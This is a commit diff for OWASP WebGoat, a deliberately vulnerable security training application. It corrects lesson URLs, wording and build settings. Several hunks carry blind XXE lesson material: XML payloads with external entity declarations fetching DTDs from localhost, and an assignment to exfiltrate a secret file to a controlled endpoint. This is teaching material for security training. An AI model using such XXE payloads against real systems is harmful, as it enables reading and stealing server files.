Fixing links in several lessons

2017-03-23 09:37:53 +01:00 · 2017-03-23 09:37:53 +01:00 · 98000d6002
commit 98000d6002
parent 634a4c75b6
8 changed files with 19 additions and 16 deletions
--- a/README.MD
+++ b/README.MD
@ -100,7 +100,7 @@ On x86 you can build a container with the following commands:
 ```Shell
 cd WebGoat/
 mvn package
-cd webgoat-container
+cd webgoat-server
 mvn package
 mvn docker:build
 docker tag webgoat/webgoat-8.0 webgoat/webgoat-8.0:8.0
--- a/webgoat-lessons/jwt/src/main/resources/i18n/WebGoatLabels.properties
+++ b/webgoat-lessons/jwt/src/main/resources/i18n/WebGoatLabels.properties
@ -1 +1 @@
-jwt.title=JWT tokens
+jwt.title=JWT tokens (Under development)
--- a/webgoat-lessons/sol.txt
+++ b/webgoat-lessons/sol.txt
@ -41,7 +41,7 @@ Blind SendFile ...
     * <pre>
     *  <?xml version="1.0"?>
     *  <!DOCTYPE root [
-     *  <!ENTITY % remote SYSTEM "http://localhost:8080/WebGoat/plugin_lessons/plugin/XXE/test.dtd">
+     *  <!ENTITY % remote SYSTEM "http://localhost:8080/WebGoat/plugin_lessons/XXE/test.dtd">
     *  %remote;
     *   ]>
     *  <user>
--- a/webgoat-lessons/xxe/src/main/java/org/owasp/webgoat/plugin/BlindSendFileAssignment.java
+++ b/webgoat-lessons/xxe/src/main/java/org/owasp/webgoat/plugin/BlindSendFileAssignment.java
@ -114,7 +114,7 @@ public class BlindSendFileAssignment extends AssignmentEndpoint {
     * <pre>
     *  <?xml version="1.0"?>
     *  <!DOCTYPE root [
-     *  <!ENTITY % remote SYSTEM "http://localhost:8080/WebGoat/plugin_lessons/plugin/XXE/test.dtd">
+     *  <!ENTITY % remote SYSTEM "http://localhost:8080/WebGoat/plugin_lessons/XXE/test.dtd">
     *  %remote;
     *   ]>
     *  <user>
--- a/webgoat-lessons/xxe/src/main/resources/i18n/WebGoatLabels.properties
+++ b/webgoat-lessons/xxe/src/main/resources/i18n/WebGoatLabels.properties
@ -26,7 +26,7 @@ xxe.simple.output=Welcome {0} you can now login to our website
 xxe.content.type.feedback.json=You are posting JSON which does not work with a XXE
 xxe.content.type.feedback.xml=You are posting XML but there is no XXE attack performed
 xxe.content.output=Welcome {0} you can now login to our website
-xxe.blind.output=Contents of the file is:
+xxe.blind.output=Contents of the file is: {0}
 xxe.hints.simple.xxe.1=Try submitting the form and see what happens
 xxe.hints.simple.xxe.2=XXE stands for XML External Entity attack
--- a/webgoat-lessons/xxe/src/main/resources/lessonPlans/en/XXE_blind.adoc
+++ b/webgoat-lessons/xxe/src/main/resources/lessonPlans/en/XXE_blind.adoc
@ -4,7 +4,7 @@ In some cases you will see no output because although your attack might have wor
 Or the resource you are trying to read contains illegal XML character which causes the parser to fail.
 Let's start with an example, in this case we reference a external DTD which we control on our own server.
-Our WebGoat server by default has an /xxe/ping endpoint which we can use. *This can be any server you control.*
+Our WebGoat server by default has an /xxe/ping endpoint which we can use. *This can be any server under your control.*
 [source]
 ----
@ -33,7 +33,7 @@ Now submit the form and change the xml to:
 ----
 <?xml version="1.0"?>
 <!DOCTYPE root [
-<!ENTITY % remote SYSTEM "http://localhost:8080/WebGoat/plugin_lessons/plugin/XXE/attack.dtd">
+<!ENTITY % remote SYSTEM "http://localhost:8080/WebGoat/plugin_lessons/XXE/attack.dtd">
 %remote;
 ]>
 <user>
@ -51,5 +51,5 @@ GET Java/1.8.0_101 HelloWorld
 So with the XXE we are able to ping our own server which means XXE injection is possible.
 [NOTE]
-In this case we use http://localhost:8080/WebGoat/plugin_lessons/plugin/XXE/test.dtd to fetch the dtd but in reality this will
+In this case we use http://localhost:8080/WebGoat/plugin_lessons/XXE/test.dtd to fetch the dtd but in reality this will
 of course be a host fully under the attackers control.
--- a/webgoat-lessons/xxe/src/main/resources/lessonPlans/en/XXE_blind_assignment.adoc
+++ b/webgoat-lessons/xxe/src/main/resources/lessonPlans/en/XXE_blind_assignment.adoc
@ -1,7 +1,10 @@
 == Blind XXE assignment
-In the previous page we showed you how you can ping a server with a XXE attack, in this assigment try to make a DTD which will upload the
+In the previous page we showed you how you can ping a server with a XXE attack, in this assignment try to make a DTD
-contents of ~/.webgoat/plugin/XXE/secret.txt to our server. For Linux: `/home/USER/.webgoat/XXE/secret.txt`, for Windows
+which will upload the contents of ~/.webgoat/plugin/XXE/secret.txt to our server.
-this would be `c:/Users/USER/.webgoat/XXE/secret.txt`
+For Linux: `/home/USER/.webgoat/XXE/secret.txt`, for Windows this would be `c:/Users/USER/.webgoat/XXE/secret.txt`
 If you use the Docker based WebGoat environment this file is located here: `/root/.webgoat/XXE/secret.txt`
 Try to upload this file using the following endpoint: `http://localhost:8080/WebGoat/XXE/ping?text=[contents_file]` (NOTE: this endpoint is under your full control)
 You can login to the Docker container as follows: `docker exec -i -t <<name>> /bin/bash`
--- a/webgoat-server/pom.xml
+++ b/webgoat-server/pom.xml
@ -86,11 +86,11 @@
            <artifactId>webgoat-container</artifactId>
            <version>${project.version}</version>
        </dependency>
-        <dependency>
+        <!--<dependency>-->
-            <groupId>org.owasp.webgoat.lesson</groupId>
+            <!--<groupId>org.owasp.webgoat.lesson</groupId>-->
-            <artifactId>challenge</artifactId>
+            <!--<artifactId>challenge</artifactId>-->
-            <version>${project.version}</version>
+            <!--<version>${project.version}</version>-->
-        </dependency>
+        <!--</dependency>-->
        <dependency>
            <groupId>org.owasp.webgoat.lesson</groupId>
            <artifactId>client-side-filtering</artifactId>
`@ -1 +1 @@`
	`jwt.title=JWT tokens`	`jwt.title=JWT tokens (Under development)`